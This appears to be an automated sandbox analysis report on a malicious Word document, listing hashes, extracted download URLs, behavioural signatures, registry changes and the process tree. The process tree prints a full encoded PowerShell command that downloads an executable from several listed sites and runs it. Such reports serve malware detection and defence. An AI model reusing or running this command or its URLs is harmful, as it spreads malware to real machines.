Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21-09-2024 01:34
Behavioral task
behavioral1
Sample
eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc
-
Size
195KB
-
MD5
eed25d6d5c363dc12cf924abd1f315c4
-
SHA1
ac3947373ab41e0ed8d52dd1d3e09c8660edf7b3
-
SHA256
d0b4b470d5e523a36a9751cec3eb8c5e1fae85904ab8637b745f1aebea3aa8cd
-
SHA512
27982f80f90b2be909823ede19f114c6dcd92dd85ccaf8ab740c1ca2907ba2d67bb6c6bcd18c01d231eefcae8c877070913643e3fc12c641a0b9c83594035eec
-
SSDEEP
1536:2rdi1Ir77zOH98Wj2gpngh+a9Z8ul8oPhEPmRl6VOE4j:2rfrzOH98ipgd8ul8uWP+l6VOE4j
Malware Config
Extracted
https://vstbar.com/wp-admin/Hs/
http://binarywebtechsolutions.com/mobile-website-designing-company-in-gurgaon/CLZ/
http://shahqutubuddin.org/U/
http://cybersign-001-site5.gtempurl.com/2xwzq/bve/
https://star-speed.vip/wp-admin/Ttv/
https://treneg.com.br/rfvmbh/a/
https://cimsjr.com/hospital/x2f/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2924 1844 powershell.exe 30 -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 2924 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{15D4EC89-F9FA-422D-BC2F-2F901B0AA81F}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{15D4EC89-F9FA-422D-BC2F-2F901B0AA81F}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{15D4EC89-F9FA-422D-BC2F-2F901B0AA81F}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{15D4EC89-F9FA-422D-BC2F-2F901B0AA81F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2064 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2924 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2064 WINWORD.EXE 2064 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2064 wrote to memory of 848 2064 WINWORD.EXE 35 PID 2064 wrote to memory of 848 2064 WINWORD.EXE 35 PID 2064 wrote to memory of 848 2064 WINWORD.EXE 35 PID 2064 wrote to memory of 848 2064 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3AGIAaQA0AE8AQwBcAFEAawByAEgAMgBaAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQBSAEkAdABgAHkAUAByAGAATwBUAGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACgAJwAxADIALAAgACcAKwAnAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQAQQA4AGcAdQBtAHkAOQAgAD0AIAAoACgAJwBGAGgAZABuACcAKwAnAHMAJwApACsAJwB1ACcAKQA7ACQAQgAwADkAbABkAHYAZAA9ACgAKAAnAEkAdwAnACsAJwB3ADMAJwApACsAJwB2ACcAKwAnADYAeQAnACkAOwAkAE0AYgBiADkAbwBjAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVwBTACcAKwAoACcAeABNACcAKwAnADcAJwApACsAKAAnAGIAaQA0ACcAKwAnAG8AJwApACsAKAAnAGMAJwArACcAVwBTACcAKQArACgAJwB4ACcAKwAnAFEAawByAGgAMgAnACsAJwB6ACcAKQArACgAJwBrAFcAJwArACcAUwB4ACcAKQApACAALQByAEUAUABsAGEAYwBFACAAIAAoACcAVwBTACcAKwAnAHgAJwApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEEAOABnAHUAbQB5ADkAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFYAMwBnAGgAbQA2ADcAPQAoACcAUAAnACsAKAAnADAAJwArACcAbgAwACcAKQArACgAJwB0ACcAKwAnAHYAOAAnACkAKQA7ACQAQwB1AGQAagBsAGwAdwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQAWQBrADkAdgBkAGcAdQA9ACgAKAAnAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AdgBzAHQAJwArACcAYgBhAHIAJwApACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwArACcAaQBuAC8AJwApACsAKAAnAEgAJwArACcAcwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwADoAJwArACgAJwAvACcAKwAnAC8AYgBpACcAKQArACgAJwBuACcAKwAnAGEAcgB5AHcAZQBiAHQAJwArACcAZQAnACkAKwAoACcAYwBoAHMAbwAnACsAJwBsAHUAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAG0AbwBiAGkAbABlACcAKwAnAC0AdwBlACcAKwAnAGIAJwArACcAcwAnACkAKwAoACcAaQB0ACcAKwAnAGUAJwApACsAKAAnAC0AJwArACcAZABlAHMAaQBnACcAKQArACgAJwBuAGkAbgBnACcAKwAnAC0AYwAnACsAJwBvACcAKQArACcAbQBwACcAKwAoACcAYQBuACcAKwAnAHkAJwArACcALQBpAG4ALQAnACkAKwAoACcAZwB1ACcAKwAnAHIAZwAnACkAKwAoACcAYQBvACcAKwAnAG4ALwBDAEwAJwApACsAKAAnAFoAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAaABhACcAKwAnAGgAcQAnACkAKwAnAHUAdAAnACsAJwB1AGIAJwArACcAdQAnACsAJwBkACcAKwAnAGQAaQAnACsAJwBuAC4AJwArACcAbwAnACsAJwByACcAKwAnAGcALwAnACsAJwBVACcAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGMAeQBiAGUAcgBzACcAKwAnAGkAZwAnACkAKwAoACcAbgAtACcAKwAnADAAMAAxAC0AcwBpACcAKwAnAHQAZQAnACsAJwA1AC4AZwB0ACcAKwAnAGUAJwApACsAJwBtACcAKwAnAHAAJwArACgAJwB1ACcAKwAnAHIAbAAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACgAJwAyAHgAJwArACcAdwB6AHEAJwApACsAKAAnAC8AYgB2AGUAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAnAC8AcwAnACsAKAAnAHQAYQAnACsAJwByAC0AJwArACcAcwBwAGUAZQAnACkAKwAnAGQAJwArACcALgB2ACcAKwAnAGkAJwArACgAJwBwAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACkAKwAnAC8AJwArACcAVAAnACsAKAAnAHQAJwArACcAdgAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwAnACsAJwB0AHIAJwApACsAJwBlACcAKwAoACcAbgBlACcAKwAnAGcAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALgBiACcAKwAnAHIALwAnACsAJwByAGYAJwApACsAKAAnAHYAbQAnACsAJwBiAGgAJwArACcALwBhAC8AKgBoAHQAJwApACsAJwB0AHAAJwArACcAcwAnACsAJwA6AC8AJwArACgAJwAvAGMAaQBtACcAKwAnAHMAJwApACsAKAAnAGoAcgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGgAJwApACsAJwBvAHMAJwArACcAcAAnACsAJwBpAHQAJwArACgAJwBhAGwALwB4ACcAKwAnADIAJwArACcAZgAvACcAKQApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAawAxAG0AbQBuAF8APQAoACcAWQAnACsAJwAxACcAKwAoACcAaAB2AHAAJwArACcAagAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABmAHkAdgBqAHQAMwAgAGkAbgAgACQAWQBrADkAdgBkAGcAdQApAHsAdAByAHkAewAkAEMAdQBkAGoAbABsAHcALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABGAEkATABFACIAKAAkAFQAZgB5AHYAagB0ADMALAAgACQATQBiAGIAOQBvAGMAawApADsAJABPAGEAawB3AG0AbQBmAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnAHoAZgAnACkAKwAoACcAaABlACcAKwAnAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQATQBiAGIAOQBvAGMAawApAC4AIgBsAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAyADMAMwApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABNAGIAYgA5AG8AYwBrACkAOwAkAE4AdABrAGYAbQA3AHEAPQAoACcAVwAnACsAJwBrAHgAJwArACgAJwB4AGsAJwArACcAMQBuACcAKQApADsAYgByAGUAYQBrADsAJABEAHAAdABsAGwAMgA3AD0AKAAoACcATQBqACcAKwAnAHQAJwApACsAKAAnAHkAJwArACcANQBjADUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOAA3ADEAcQBkAGkAPQAoACcAVgAnACsAJwA0ACcAKwAoACcAcQBjAHQAJwArACcAdgAzACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5625ecc1101354dc7c0f28d7c22e91132
SHA1d38ed0b7e4a8755e9666e2258ae5dfcfa62f052b
SHA256ffa8362397ce641059a3921dd4f26f348ed739202ad87398d42d3284685a9f59
SHA51238e60d1a0e62c3908b76fcfb0bcbb65e10574422fe9d2bb53f8c9c3631db212eda6032123984997e9cb6b0abb15c9821cc856492caa704b36f2a968be1adabf9